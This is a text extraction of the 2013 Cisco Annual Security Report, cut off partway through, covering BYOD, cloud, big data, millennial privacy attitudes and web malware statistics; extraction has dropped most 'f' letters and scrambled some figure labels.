Raportul Cisco pe Securitate 2013

7/29/2019 Raportul Cisco pe Securitate 2013

1/41


2/41

2013 Cisco Annual Security Report2

Cybercriminals are taking advantage o the rapidly expanding attack surace ound

in todays any-to-any world, where individuals are using any device to access

business applications in a network environment that utilizes decentralized cloud

services. The 2013 Cisco Annual Security Reporthighlights global threat trends

based on real-world data, and provides insight and analysis that helps businesses

and governments improve their security posturing or the uture. The report

combines expert research with security intelligence that was aggregated

rom across Cisco, ocusing on data collected during the 2012 calendar year.


3/41


The Nexus o Devices, Clouds, and Applications 6

Endpoint Prolieration 12

Services Reside in Many Clouds 18

Blending o Business and Personal Use 22

Millennials and the Workplace

Big Data 28

A Big Deal or Todays Enterprises

State o the Exploit 32

Danger Lurks in Surprising Places

Evolutionary Threats 50

New Methods, Same Exploits

Spam the Ever Present 58

Security Outlook 2013 70

About Cisco Security Intelligence Operations 74

Contents


4/41


The Nexusof Devices,

Clouds, andApplications

While this evolution is not unexpected,

todays enterprises may be unprepared

or the reality o navigating an any-

to-any worldat least, rom a security

perspective.

The crux o the any-to-any issue is

this: Were quickly reaching the point

where it is increasingly less likely that

a user is going to access a business

through an enterprise network, says

Chris Young, Senior Vice President o

the Security and Government Group at

Cisco. More and more, its about any

device in any location coming over any

instantiation o the network. Internet-

enabled devicessmartphones, tablets,

and moreare trying to connect to

applications that could be running

anywhere, including in a public SaaS

cloud, in a private cloud, or in a

hybrid cloud.

At the same time, another evolution

is underwaya steady movement

toward the ormation o the Internet

o Everything. This is the intelligent

connection o:

People: Social networks, population

centers, digital entities

Processes: Systems, business

processes

Data: World Wide Web, inormation

Things: Physical world, devices

and objects

More and more, its about anydevice in any location comingover any instantiation o the

network. Internet-enableddevicessmartphones, tablets,and moreare trying to connectto applications that could berunning anywhere.


5/41


The Internet o Everything builds on

an Internet o Things1 oundation

by adding network intelligence that

allows convergence, orchestration,

and visibility across previously

disparate systems. Connections in

the Internet o Everything arent just

about mobile devices or laptops anddesktops, but also the rapidly growing

number o machine-to-machine (M2M)

connections coming online each day.

These things are oten objects we

take or granted or rely on each day,

and dont traditionally think o as being

connectedsuch as a home heating

system, a wind turbine, or a car.

The Internet o Everything is a

uture state, to be sure, but is not

so distant when the any-to-anyissue is considered. And while it,

too, will create security challenges

or enterprises, it will bring new

opportunities as well. Amazing things

will happen and be created as the

Internet o Everything grows, says

Nancy Cam-Winget, a distinguished

engineer, Cisco. The growth and

convergence o people, processes,

data, and things on the Internet will

make networked connections more

relevant and valuable than ever beore.Ultimately, the Internet o Everything

will create new capabilities, richer

experiences, and unprecedented

economic opportunities or countries,

businesses, and indiv iduals.

How the CloudComplicates SecurityThe challenge o securing a wide

range o applications, devices, and

userswhether in an any-to-any or

Internet o Everything contextis madetougher by the popularity o the cloud

as a means o managing enterprise

systems. According to data compiled

by Cisco, global data center traic is

expected to quadruple over the next

ive years, and the astest-growing

component is cloud data. By 2016,

global cloud traic will make up nearly

two-thirds o total data center traic.

Piecemeal security solutions, such

as applying irewalls to a changeable

network edge, dont secure data thatis now constantly in motion among

devices, networks, and clouds. Even

among data centerswhich now

house organizations crown jewels

(big data)virtualization is becoming

more the rule than the exception.

Addressing security challenges

presented by virtualization and the

cloud requires rethinking security

postures to relect this new paradigm

perimeter-based controls and old

models o access and containment

need to be changed to secure the new

business model.

Connected Workersand Data PrivacyAnother complicating actor in

the any-to-any equation is young,

mobile workers. This group believes

they should be able to do business

wherever they happen to be and on

whatever devices they have at hand.

Featured in this years 2013 CiscoAnnual Security Reportare indings

rom the 2012 Cisco Connected World

Technology Reportwhich build on

research conducted in 2011 about

the changing attitudes that college

students and young proessionals

around the globe have toward work,

technology, and security.

The latest study shines even more

light on these workers attitudes

toward security, with a special ocus

on privacy and how much or howoten a company can intrude on an

employees desire to reely roam the

Internet while at work. The 2012 Cisco

Connected World Technology Report

study also examines whether online

privacy is still something that all users

actively worry about.

Data Analysis andGlobal Security TrendsThe 2013 Cisco Annual Security

Reportincludes in-depth analysis o

web malware and spam trends, based

on research conducted by Cisco.

While many who operate in the

The growth and convergenceo people, processes, data, andthings on the Internet will makenetworked connections morerelevant and valuable than

ever beore.Nancy Cam-Winget, Distinguished

Engineer, Cisco.

Another complicating actor inthe any-to-any equation is young,mobile workers. This groupbelieves they should be ableto do business wherever they

happen to be and on whateverdevices they have at hand.

Global data center traic isexpected to quadruple over the

next ive years, and the astest-growing component is clouddata. By 2016, global cloud traicwill make up nearly two-thirds ototal data center traic.


6/41


shadow economy have centered theireorts in recent years on developing

increasingly sophisticated techniques,

Ciscos research makes clear that

cybercriminals are oten turning to

well-known and basic methods to

compromise users.

The rise in distributed denial o

service (DDoS) attacks over the past

year is just one example o the trend

toward whats old is new again in

cybercrime. For several years, DDoSattackswhich can paralyze Internet

service providers (ISPs) and disrupt

traic to and rom targeted websites

have been low on the list o IT security

priorities or many enterprises.

However, recent campaigns against

a number o high-proile companies

including U.S. inancial institutions2

serve as a reminder that any

cybersecurity threat has the potential

to create signiicant disruption,

and even irreparable damage, ian organization is not prepared or

it. Thereore, when creating their

business continuity management

plans, enterprises would be wise to

consider how they would respond to

and recover rom a disruptive cybereventwhether that event takes the

orm o a DDoS attack directed at the

company; a critical, Internet-enabled

manuacturing acility suddenly going

oline; an advanced multistage attack

by the criminal underground; or

something else never beore seen.

While the IT security discussion has

suered more than its air share

o alarmism over the years, we are

seeing some disturbing changesin the threat environment acing

governments, companies, and

societies, says John N. Stewart,

Senior Vice President and Chie

Security Oicer at Cisco. Cybercrime

is no longer an annoyance or another

cost o doing business. We are

approaching a tipping point where

the economic losses generated

by cybercrime are threatening to

overwhelm the economic beneits

created by inormation technology.Clearly, we need new thinking and

approaches to reducing the damage

that cybercrime inlicts on the well-

being o the world.

We are seeing some disturbing changes in the threat environmentacing governments, companies, and societies.

John N. Stewart, Senior Vice President and Chie Security Oicer at Cisco.


7/41


EndpointProliferation

Considering that less than 1 percent

o things in the physical world are

connected today, there remains

vast potential to connect the

unconnected.4 It is projected that

with an Internet that already has

an estimated 50 billion things

connected to it, the number o

connections will increase to

13,311,666,640,184,600 by the

year 2020. Adding just one more

Internet-connected thing (50 billion

+ 1) will increase the number o

connections by another 50 billion.5

As or the things that will eventually

comprise the everything, they will

range rom smartphones to home

heating systems to wind turbines

to cars. Dave Evans, Ciscos Chie

Futurist with the Internet Business

Solutions Group, explains the concept

o endpoint prolieration like this:

When your car becomes connected

to the Internet o Everything in the

near uture, it will simply increase the

number o things on the Internet by

one. Now, think about the numerous

other elements to which your car could

be connectedother cars, stoplights,

your home, service personnel, weather

reports, warning signs, and even the

road itsel.6

When your car becomesconnected to the Internet oEverything in the near uture, itwill simply increase the numbero things on the Internet by one.Now, think about the numerousother elements to which your carcould be connectedother cars,stoplights, your home, service

personnel, weather reports,warning signs, and even theroad itsel.

David Evans, Chie Futurist, Cisco


8/41


People toMachine (P2M)

People toPeople (P2P)

Machine toMachine (M2M)

People

Data

Process

Things

Business

Home Mobile

Figure 1: The Internet o EverythingThe Internet o Everything is the intelligent connection o people, processes, data,

and things.

In the Internet o Everything,

connections are what matter most.

The types o connections, not the

number, are what create value

between people, processes, data, and

things. And eventually, the number

o connections will dwar the numbero things.7 The explosion o new

connections already becoming part

o the Internet o Everything is driven

primarily by the development o more

and more IP-enabled device, but also

by the increase in global broadband

availability and the advent o IPv6. The

security risks posed by the Internet o

Everything are not just related to the

any-to-any endpoint prolieration that

is bringing us closer, day by day, to an

even more highly connected world,but also the opportunity or malicious

actors to utilize even more inroads

to compromise users, networks, and

data. The new connections themselves

create risk because they will generate

even more data in motion that needs

to be protected in real timeincluding

the ballooning volumes o big data that

enterprises will continue to collect,

store, and analyze.

The Internet o Everything is quickly

taking shape, so the security

proessional needs to think about

how to shit their ocus rom simply

securing endpoints and the network

perimeter, says Chris Young. There

will be too many devices, too many

connections, and too many content

types and applicationsand the

number will only keep growing. In this

new landscape, the network itsel

becomes part o the security paradigm

that allows enterprises to extend

policy and control over dierent

environments.

In the Internet o Everything, connections are what matter most.

The types o connections, not the number, are what create valuebetween people, processes, data, and things.

The Internet o Everything isquickly taking shape, so thesecurity proessional needs tothink about how to shit theirocus rom simply securing

endpoints and the networkperimeter

Chris Young


9/41


Cisco BYOD UpdateEndpoint prolieration is a phenomenon Cisco knows well within its own organization o

70,000 employees worldwide. Since ormalizing its BYOD practice two years ago, the

company has witnessed a 79 percent growth rate in the number o mobile devices in

use in the organization.

The Cisco 2011 Annual Security Report8 irst examined Ciscos unolding BYOD journey,

which is part o the organizations ongoing and broader transition toward becoming avirtual enterprise. By the time Cisco reaches the last stage o its planned journey,

which will take several years, the company will be increasingly location- and service-

independentand enterprise data still will be secure.9

In 2012, Cisco added about 11,000 smartphones and tablet computers companywideor

about 1,000 new Internet-enabled devices per month. At the end o 2012, there were nearly

60,000 smartphones and tablets in use in the organizationincluding just under 14,000

iPadsand all o them were Bring Your Own (BYO), says a Brett Belding, Senior Manager

Overseeing Cisco IT Mobility Services. Mobile at Cisco is now BYO, period.

The device type thats seen the biggest increase in use at Cisco is the Apple iPad.

Its ascinating to think that three years ago, this product didnt even exist, says Belding.

Now, there are more than 14,000 iPads being used at Cisco every day by our employees

or a variety o activitiesboth personal- and work-related. And employees are using

iPads in addition to their smartphones.

As or smartphones, the number o Apple iPhones in use at Cisco has almost tripled in two

years time to nearly 28,600. RIM BlackBerry, Google Android, and Microsot Windows

devices are also included in the BYOD program at Cisco. Employees make the choice to

trade having access to corporate data on their personal device with agreement on security

controls. For example, i you want to check your email and calendar on your device, you

have to take Ciscos security proile that enorces remote wipe, encryption, and passphrase.

Social support has been a key component o the BYOD program at Cisco rom the start.

We rely heavily on [the enterprise collaboration platorm] WebEx Social as our BYOD support

platorm, and its paid huge dividends, says Belding. We have more devices supported

than ever beore and, at the same time, weve had the ewest number o support cases.

Our goal is that someday an employee can simply bring in any device and sel-provision

using the Cisco Identity Services Engine (ISE) and set up our core WebEx collaboration

tools, including Meeting Center, Jabber, and WebEx Social.

The next step or BYOD at Cisco, according to Belding, is to urther improve security by

increasing visibility and control over all user activity and devices, on both the physical

network and virtual inrastructure, while improving the user experience. Caring about theuser experience is a core consumerization o IT trend, says Belding. Were trying to apply

this concept to our organization. We have to. I think what were seeing now is an IT-ization

o users. Were beyond the point o them asking, Can I use this device at work? Now

theyre saying, I understand you need to keep the enterprise secure, but dont interere

with my user experi ence.

Figure 2

We have more devices supported than ever beore and, at thesame time, weve had the ewest number o support cases. Our goalis that someday an employee can simply bring in any device and

sel-provision using the Cisco Identity Services Engine (ISE) and setup our core WebEx collaboration tools, including Meeting Center,Jabber, and WebEx Social.

Brett Belding, Senior Manager Overseeing Cisco IT Mobility Services

I understand you need to keep the enterprise secure, but dontinterere with my user experience.

Brett Belding, Senior Manager Overseeing Cisco IT Mobility Services

IPhone

iPad

BlackBerry

Android

Other

TOTAL

PLATFORM

DEC

2010

DEC

2011

DEC

2012


10/41


ServicesReside in

Many CloudsO this tremendous growth, the

astest-growing component is cloud

data. Global cloud traic will increase

six-old over the next ive years,

growing at a rate o 44 percent rom

2011 to 2016. In act, global cloud

traic will make up nearly two-thirds o

total data center traic by 2016.11

This explosion in cloud traic

raises questions about the ability o

enterprises to manage this inormation.

In the cloud, the lines o control are

blurred: Can an organization place

saety nets around its cloud data whenthey dont own and operate the data

center? How can even basic security

tools such as irewalls and antivirus

sotware be applied when the network

edge cannot be deined?

No matter how many security

questions are raised, its clear more

and more enterprises are embracing

the beneits o cloudsand those

Global cloud traic will increasesix-old over the next ive years,growing at a rate o 44 percent

rom 2011 to 2016.


11/41


that have are not likely to return to a

the private data center model. While

the opportunities o the cloud or

organizations are manyincluding

cost savings, greater workorce

collaboration, productivity, and a

reduced carbon ootprintthe possiblesecurity risks that enterprises ace as

a result o moving business data and

processes to the cloud.

Hypervisors

I compromised, this sotware that

creates and runs virtual machines

could lead to mass hacking or

data compromise against multiple

serversapplying the same ease

o management and access that

virtualization provides to a successul

hack. A rogue hypervisor (taken

control o by hyperjacking) can take

complete control o a server.12

Lowered cost o entryVirtualization has lowered the cost o

entry to provide services like a vir tual

private server (VPS). Compared to

older hardware-based data center

models, we are seeing a growth in

quick, cheap, and easily availableinrastructure or criminal activities.

For instance, there are many VPS

services available or instant sale

(with the ability to purchase using

Bitcoin or other hard-to-trace payment

types) that are targeted to the criminal

underground. Virtualization has made

inrastructure much cheaper and

easier to providewith little to no

policing o activities.

Decoupling o virtualized

applications

Because virtualized applications are

decoupled rom the physical resources

they use, it becomes more diicult

or enterprises to apply traditional

security approaches. IT providers

seek to minimize cost with a very

elastic oering in which they can move

resources as neededcontrasted with

the security group seeking to collocate

services o like security posture and

keep them apart rom others that may

be less secure.

Virtualization and cloud computing

create problems just like those o

BYOD, but turned on their head,

says Joe Epstein, ormer Chie

Executive Oicer o Virtuata, a

company acquired by Cisco in 2012

that provides innovative capabilitiesor securing virtual machine-level

inormation in data centers and

cloud environments. High-value

applications and high-value data are

now moving around the data center.

And the notion o virtual workloads

makes enterprises uncomortable.

In the virtual environment, how do

you know you can trust what youre

running? The answer is that you

havent been able to so arand that

uncertainty has been a key barrier tocloud adoption.

But Epstein notes that it is becoming

increasingly diicult or enterprises

to ignore virtualization and the

cloud. The world is going to share

everything, he says. Everything

will be virtualized; everything will

be shared. It will not make sense to

continue running only private data

centers; hybrid clouds are where IT

is heading.

The answer to these growing cloud

and virtualization challenges is

adaptive and responsive security.

In this case, security must be a

programmable element seamlessly

integrated into the underlying data

center abric, according to Epstein. Inaddition, security needs to be built in

at the design phase, instead o being

bolted on post-implementation.

A rogue hypervisor (taken controlo by hyperjacking) can takecomplete control o a server.

Virtualization and cloudcomputing create problemsjust like those o BYOD, butturned on their head... High-valueapplications and high-value

data are now moving aroundthe data center.

Joe Epstein, Former Chie Executive

Oicer o Virtuata


12/41


Blending ofBusiness and

Personal UseMillennials and

the Workplace

According to the 2012 CiscoConnected World Technology Report

study, two-thirds o respondents

believe employers should not track

employees online activities on

company-issued devices. In short,

they do not think employers have any

business monitoring such behavior.

Only about one-third (34 percent) o

workers surveyed say they dont mind

i employers track their online behavior.

Only one in ive respondents saytheir employers do track their online

activities on company-owned devices,

while 46 percent say their employers

do not track activity. Findings or the

latest Connected Worldstudy alsoshow that Millennials have strong

eelings about employers tracking the

online activity o workerseven those

who report they work at organizations

where such tracking does not occur.

Only one in ive respondentssay their employers do tracktheir online activities on

company-owned devices,while 46 percent say theiremployers do not track activity.


13/41


Compounding the challenges or

security proessionals, there appears

to be a disconnect between what

employees think they can do with

their company-issued devices and

what policies IT actually dictates

about personal usage. Four out o 10respondents say they are supposed

to use company-issued devices or

work activity only, while a quarter

say they are allowed to use company

devices or non work activity. However,

90 percent o IT proessionals

surveyed say they do indeed have

policies that prohibit company-issued

devices being used or personal

online activityalthough 38 percent

acknowledge that employees break

policy and use devices or personal

activities in addition to doing work.

You can ind inormation about Ciscos

approach to these BYOD challenges

on page 16.

Privacy and MillennialsAccording to the 2012 Cisco

Connected World Technology Report,

Millennials have accepted the act

that, thanks to the Internet, personal

privacy may be a thing o the past. 91

percent o young consumers surveyedsay that the age o privacy is over and

believe they cant control the privacy

o their inormation, with one third o

respondents reporting they are not

worried about the data that is stored

and captured about them.

In general, Millennials also believe their

online identity is dierent rom their

oline identity. 45 percent say these

identities are oten dierent depending

on the activity in question, while 36percent believe these identities are

completely dierent.

Only 8 percent believe these identities

are the same.

Young consumers also have high

expectations that websites will keep

their inormation private, oten eeling

more comortable sharing data with

large social media or community sites

given the cloak o anonymity the crowd

provides. Forty-six percent say they

expect certain websites to keep their

inormation secure, while 17 percent

say they trust most websites to keep

their inormation private. However,

29 percent say that not only do

they not trust websites to keep their

inormation private; they are very

concerned about security and identitythet. Compare this to the idea o

sharing data with an employer who

has the context about who they are

and what they do.

Millennials are now entering the

workplace and bringing with them

new working practices and attitudes

to inormation and the associated

security thereo. They believe in the

demise o privacythat its simply

deunct in practice, and its in this

paradigm that organizations must

operatea concept that will be

alarming to the older generation in

the workplace, says Adam Philpott,

Director, EMEAR Security Sales, Cisco.

Organizations can, however, look to

provide inormation security education

to their employees to alert them to the

risks and provide guidance on how

best to share inormation and leverage

online tools within the realms o

data security.

There appears to be adisconnect between whatemployees think they can dowith their company-issued

devices and what policiesIT actually dictates aboutpersonal usage.

Millennials are nowentering the workplaceand bringing with themnew working practices andattitudes to inormation and

the associated securitythereo. They believe in thedemise o privacythat itssimply deunct in practice,and its in this paradigmthat organizations mustoperatea concept that willbe alarming to the oldergeneration in the workplace.

Adam Philpott, Director, EMEAR

Security Sales, Cisco


14/41


Why Enterprises Need to Raise Awarenesso Social Media Disinormationby Jean Gordon Kocienda

Global Threat Analyst, Cisco

Social media has been a boon or many enterprises; the ability to connect directly withcustomers and other audiences via Twitter and Facebook has helped many organizations

build brand awareness via online social interaction.

The lip side o this lightning-ast direct communication is that social media can allow

inaccurate or misleading inormation to spread like wildire. It isnt hard to imagine a

scenario in which a terrorist coordinates on-the-ground attacks by using misleading

tweets with the intent to clog roads or phone line, or to send people into the path o

danger. One example: Indias government blocked hundreds o websites and curbed

texts(ootnote:13) this summer in an attempt to restore calm in north-eastern part o

the country ater photographs and text messages were posted. The rumors prompted

thousands o panicked migrant workers to lood train and bus stations.

Similar social media disinormation campaigns have aected market prices as well. A

hijacked Reuters Twitter eed reported that the Free Syrian Army had collapsed in Aleppo.

A ew days later, a Twitter eed was compromised, and a purported top Russian diplomat

tweeted that Syrian President Bashar Al-Assad was dead. Beore these accounts could

be discredited, oil prices on international markets spiked.14

Security proessionals need to be alert to such ast-moving and potentially damaging

social media posts, especially i they are directed at the enterprise itseland quick

action is needed to deend networks rom malware, alert employees to a bogus phishing

attempt, re-route a shipment, or advise employees regarding saety. The last thing

security executives want to do is alert managers to a breaking story that turns out to be a

hoax.

The irst saeguard against alling or abricated stories is to conirm the story across

multiple sources. At one time, journalists did this job or us, so that by the time we read

or heard the news, it was vetted. These days, many journalists are getting their stories

rom the same Twitter eeds that we are, and i several o us all or the same story,

we can easily mistake re-tweets or story conirmation.

For ast-breaking news requiring quick action, your best bet may be to use the

old-ashioned sni test. I the story seems ar-etched, think twice beore repeating

or citing it.15

For ast-breaking news requiring quick action, your best bet may be to

use the old-ashioned sni test. I the story seems ar-etched, thinktwice beore repeating or citing it.


15/41


Big DataA Big Deal or

Todays Enterprises

The 2012 Cisco Connected World

Technology Reportexamined the

impact o the big-data trend on

enterprisesand more speciically,

their IT teams. According to the

studys indings, about three-quarters

(74 percent) o organizations globally

are already collecting and storing

data, and management is using

analysis o big data to make business

decisions. Additionally, seven in 10

IT respondents reported that big

data will be a strategic priority or

their company and IT team in the

year ahead.

As mobility, cloud, virtualization,

endpoint prolieration, and other

networking trends evolve or emerge,they will pave the way or even more

big data and analytics opportunities

or businesses. But there are security

concerns about big data. The 2012

Connected Worldstudys indings

show that a third o respondents

(32 percent) believe big data

complicates security requirements

and protection o data and networks

because there is so much data and too

many ways o accessing it. In shor t,

big data increases the vectors and

angles that enterprise security teams

and security solutionsmust cover.

About 74 percent o organizationsglobally are already collecting andstoring data, and management

is using analysis o big data tomake business decisions.


16/41


Korea (45 percent), Germany

(42 percent), the United States

(40 percent), and Mexico (40 percent)

had the highest percentages o

IT respondents who believe big

data complicates security. To help

ensure security, the majority o IT

respondentsmore than two-thirds

(68 percent)believe the entire IT

team should participate in strategizing

and leading big data eorts withintheir companies. Gavin Reid, Director

o Threat Research or Cisco Security

Intelligence Operations, says Big data

doesnt complicate securityit makes it

possible. At Cisco we collect and store

2.6 trillion records every daythat

orms the platorm rom which we can

start incident detection and control.

As or solutions designed to help

enterprises both better manage and

unlock the value o their big data, thereare barriers to adoption. Respondents

pointed to lack o budget, lack o time

to study big data, lack o appropriate

solutions, lack o IT sta, and lack

o IT expertise. The act that almost

one in our respondents globally

(23 percent) said lack o expertise

and personnel was an inhibitor to their

enterprises ability to use big data

eectively indicates a need or moreproessionals entering the job market

to be trained in this area.

The cloud is a actor in big data

success, as well, according to 50

percent o IT respondents to the 2012

Connected Worldstudy. They believe

their organizations need to work

through cloud plans and deployments

to make big data a worthwhile venture.

This sentiment was prominent in China

(78 percent) and India (76 percent),

where more than three out o our

respondents believed there was a

dependency on cloud beore big

data could truly take o. As a result,

in some cases, the study indicates

cloud adoption will impact the rate o

adoptionand beneitso big-data

eorts.

More than hal o overall IT

respondents also conirmed that

big-data discussions within their

companies are not ruitul yet. That

is not surprising considering the

market is just now trying to understand

how to harness their big data,

analyze it, and use it strategically.

In some countries, however, big-data

discussions are resulting in meaningul

decisions on strategy, direction, and

solutions. China (82 percent), Mexico

(67 percent), India (63 percent), and

Argentina (57 percent) lead in this

regard, with well over hal o the

respondents rom these countries

claiming that big-data discussions

in their organizations are well

underwayand leading to solid

actions and results.

Three out o ive IT respondents to the

2012 Connected World Reportbelieve

big data can help countries and their

economies become more competitive

in the global marketplace.

Korea, Germany, the UnitedStates, and Mexico had thehighest percentages o ITrespondents who believe bigdata complicates security.

There are some countries wherebig-data discussions are resultingin meaningul decisions onstrategy, direction, and solutions.China, Mexico, India, and

Argentina lead in this regard, withwell over hal o the respondentsrom these countries claimingthat big-data discussions intheir organizations are wellunderwayand leading to solidactions and results.

As or solutions that are designedto help enterprises both bettermanage and unlock the value otheir big data, there are barriersto adoption. Respondents pointedto lack o budget, lack o time to

study big data, lack o appropriatesolutions, lack o IT sta, and lacko IT expertise.


17/41


State ofthe Exploit

Danger Lurks inSurprising Places

The general belie is that sites that

promote criminal activitysuch as

sites selling illegal pharmaceuticals

or countereit luxury goodsare most

likely to host malware. Our data reveals

the truth o this outdated notion, as

Web malware encounters are typically

not the by-product o bad sites in

todays threat landscape.

Web malware encounters occur

everywhere people visit on the

Internetincluding the most legitimate

o websites that they visit requently,

even or business purposes,says

Mary Landesman, Senior Security

Researcher with Cisco. Indeed,

business and industry sites are one

o the top three categories v isitedwhen a malware encounter occurred.

O course, this isnt the result o

business sites that are designed to

be malicious. The dangers, however,

are oten hidden in plain sight through

exploit-laden online ads that are

distributed to legitimate websites, or

hackers targeting the user community

on the common sites they use most.

In addition, malware-inectedwebsites are prevalent across many

countries and regionsnot just in

one or two countries, dispelling the

notion that some countries websites

are more likely to host malicious

content than others. The web is the

most ormidable malware delivery

mechanism weve seen to date,

outpacing even the most proliic

Dangers are oten hidden inplain sight through exploit-ladenonline ads.


18/41


worm or virus in its ability to reach

and inecta mass audience silently

and eectively, says Landesman.

Enterprises need protection, even i

they block common bad sites, with

additional granularity in inspection

and analysis.

Malware Encountersby Company SizeThe largest enterprises (25,000+

employees) have more than 2.5

times the risk o encountering web

malware than smaller companies.

This increased risk may be a relection

that larger companies possess more

high-value intellectual property and

thus are more requently targeted.

While smaller companies have ewer

web malware encounters per user, its

important to note that all companies

regardless o sizeace signiicant

risk o web malware encounters.

Every organization should ocus on

the undamentals o securing its

network and intellectual property.

Malware Encountersby CountryCiscos research shows signiicant

change in the global landscape or

web malware encounters by country

in 2012. China, which was second

on the list in 2011 or web malware

encounters, ell dramatically to

sixth position in 2012. Denmark and

Sweden now hold the third and ourth

spots, respectively. The United States

retains the top ranking in 2012, as it

did in 2011, with 33 percent o all web

malware encounters occurring viawebsites hosted in the United States.

Changes in geographical location

between 2011 and 2012 likely relect

both changes in detection and user

habits. For example, malvertising,

or malware delivered via online ads,

played a more signiicant role in

web malware encounters in 2012

than in 2011. It is worth repeating

that web malware encounters most

requently occur via normal browsing

o legitimate websites that may have

been compromised or are unwittingly

serving malicious advertising.

Malicious advertising can impact any

website, regardless o the sites origin.

Overall, the geographical data or

2012 demonstrates that the web is an

equal-opportunity inectorcontrary to

the perceptions that only one or two

countries are responsible or hosting

web malware or that any one country

is saer than another. Just as thedynamic content delivery o Web 2.0

enables the monetization o websites

across the globe, it can also acilitate

the global delivery o Web malware.

Figure 3: Risk by Company SizeUp to 2.5 times more risk o encountering web malware or large organizations.

250 or less

251500

5011,000

1,0012,500

2,5015,000

5,00110,000

10,00125,000

Above 25,000

i i

Number of Employees

All companiesregardless o sizeace signiicant risk o web malwareencounters. Every organization should ocus on the undamentals osecuring its network and intellectual property.


19/41


Figure 4: Web Malware Encounters by CountryOne-third o all web malware encounters resulted rom domains hosted in the United States.

GAIN FROM 2011 DECLINE FROM 2011

United States

Germany

Netherlands

33.14%

Russia9.79%

2.27%

Denmark

9.55%

Turkey2.63%

Sweden

Ireland

9.27%

6.11%

China5.65%

United Kingdom4.07%

1.95%

1 2

4

3

6

5

8

710

9

Overall, the geographical data or 2012 demonstrates that the web isan equal-opportunity inectorcontrary to the perceptions that onlyone or two countries are responsible or hosting web malware or thatany one country is saer than another.


20/41


O course, there is a distinct

dierence between where a Web

malware encounter occurs and

where the malware is actually hosted.

In malvertising, or example, the

encounter typically occurs when

visiting a reputable, legitimate website

that happens to carry third-party

advertising. However, the actual

malware intended or delivery is

hosted on a completely dierent

domain. Since our data is based on

where the encounter occurred, it has

no bearing on actual malware origin.

For instance, increased popularity o

social media and entertainment sites

in Denmark and Sweden, coupled with

malvertising risks, is largely responsible

or increased encounters rom sites

hosted in those regions but is not

indicative o actual malware origin.

Top Web MalwareTypes in 2012Android malware grew substantially

aster than any other orm o web-

delivered malware, an important trend

given that Android is reported to hold

the majority o mobile device market

share worldwide. It is important to

note that mobile malware encounterscomprised only 0.5 percent o all web

malware encounters in 2012, with

Android taking over 95% o all these

web malware encounters. In addition,

2012 saw the emergence o the irst

documented Android botnet in the

wild, indicating that mobile malware

developments in 2013 bear watching.

While some experts are claiming

Android is the biggest threat

or should be a primary ocus or

enterprise security teams in 2013

the actual data shows otherwise. As

noted above, mobile web malware

in general makes up less than 1

percent o total encountersar rom

the doomsday scenario many are

detailing. The impact o BYOD and

the prolieration o devices cannot

be overstated, but organizations

should be more concerned with

threats such as accidental data loss,

ensuring employees do not root

or jailbreak their devices, and only

install applications rom oicial and

trusted distribution channels. I users

choose to go outside oicial mobile

app stores, they should ensure, beore

downloading an app, that they know

and trust the apps author and can

validate that the code has not been

tampered with.

Looking at the wider landscape or

web malware, it is not surprising thatmalicious scripts and iFrames

comprised 83 percent o encounters

in 2012. While this is relatively

consistent with previous years,

Figure 5: Top Web Malware TypesAndroid malware encounters grew 2,577 percent over 2012, though mobile malware only

makes up a small percentage o total web malware encounters.

JAN FEB MAR APR MAY JUN JUL AUG SEP OCT NOV DEC

Android Growth

Malware / Hack Kit 0.057%

Ransomware 0.058%

Scareware 0.16%

Mobile 0.42%

Virus 0.48%

Worm 0.89%

Downloader 1.1%

Infostealing 3.4%

Exploit 9.8%

Malscript/Iframe 83.4%

Android Growth: 2,577%

il l i ll lI ,


21/41


its a inding worthy o relection.

These types o attacks o ten represent

malicious code on trusted webpages

that users may visit every day

meaning an attacker is able to

compromise users without even

raising their suspicion.

Exploits take the second spot, with

10 percent o the total number o

web malware encounters last year.

However, these igures are largely a

result o where the block occurred

versus actual concentration o exploits

on the web. For example, the 83

percent o malicious scripts and

hidden iFrames are blocks that occur

at an earlier stage, prior to any exploit

rendering; hence, they may artiicially

decrease the number o exploits

observed.

Exploits remain a signiicant cause

o inection via the web, and their

continued presence underscores the

need or vendors to adopt security

best practices in their product

liecycles. Organizations should ocus

on security as part o the product

design and development process,

with timely vulnerability disclosures,

and prompt/regular patch cycles.Organizations and users also need to

be made aware o the security risks

associated with using products that

are no longer supported by vendors.

It is also critical or organizations

to maintain a core vulnerability

management process and or users

keep to their hardware and sotware

up to date.

Rounding out the top ive are

inostealers, with 3.5 percent o the

total web malware encounters in

2012, downloaders (1.1 percent), and

worms (0.8 percent). Once again,

these numbers are a relection o

where the block occurs, generally

at the point in which the malicious

script or iFrame is irst encountered.

As a result, these numbers are not

relective o the actual number o

inostealers, downloaders, or worms

being distributed via the web.

Top MalwareContent TypesMalware creators constantly seek to

maximize their return on investment

(ROI) by inding ways to reach the

largest population o potential victims

with the least eort, and they oten

take advantage o cross-platorm

technologies when possible. Toward

these ends, exploit toolkits generally

deliver exploits in a speciic order;once a successul exploit has been

delivered, no urther exploits are

attempted. The high concentration

o Java exploits87 percent o total

web exploitsshows that these

Figure 6: Top Malware Content Types or 2012Java exploits comprised 87 percent o total web exploits.

J F M A M J J A S O N D


ApplicationText

Image

Video

Audio

Message

Java

PDF

Flash

Active-X

0%

20%

40%

60%

80%

100%

0%

20%

40%

60%

80%

100%

Application

65.05%

Text

33.81%

Image

1.09%

Video

0.05%

Audio

0.01%

Message

0.00%

Monthly Major Content Types

Total Major Content Types

Exploit Content Types

The high concentration o Java exploits shows that these vulnerabilitiesare attempted prior to other types o exploits and also demonstratesthat attackers are inding success with Java exploits.


22/41


vulnerabilities are attempted prior

to other types o exploits and also

demonstrates that attackers are

inding success with Java exploits.

Additionally, with over 3 billion devices

running Java,16 the technology

represents a clear way or hackers

to scale their attacks across multiple

platorms.

Two other cross-platorm

technologiesPDF and Flashtook

the second and third spots in Ciscos

analysis o the top content types

or malware distribution. Though

Active X is still being exploited, Cisco

researchers have seen a consistently

low use o the technology as a vehicle

or malware. However, as noted earlier

regarding Java, lower numbers o

certain types o exploits are largely a

relection o the order in which exploits

are attempted.

In examining media content, Cisco

data reveals almost twice as much

image-based malware than non-Flash

video. However, this is due, in part,

to the way browsers handle declared

content types, and attackers eorts

to manipulate these controls by

declaring erroneous content types.In addition, malware command-and-

control systems oten distribute server

inormation via comments hidden in

ordinary image iles.

Top Site CategoryAs Cisco data shows, the notion

that malware inections most

commonly result rom risky sites

such as countereit sotware is a

misconception. Ciscos analysis

indicates that the vast majority o webmalware encounters actually occur

via legitimate browsing o mainstream

websites. In other words, the majority

o encounters happen in the places

that online users visit the mostand

think are sae.

Holding the second spot on the list

are online advertisements, comprising

16 percent o total web malware

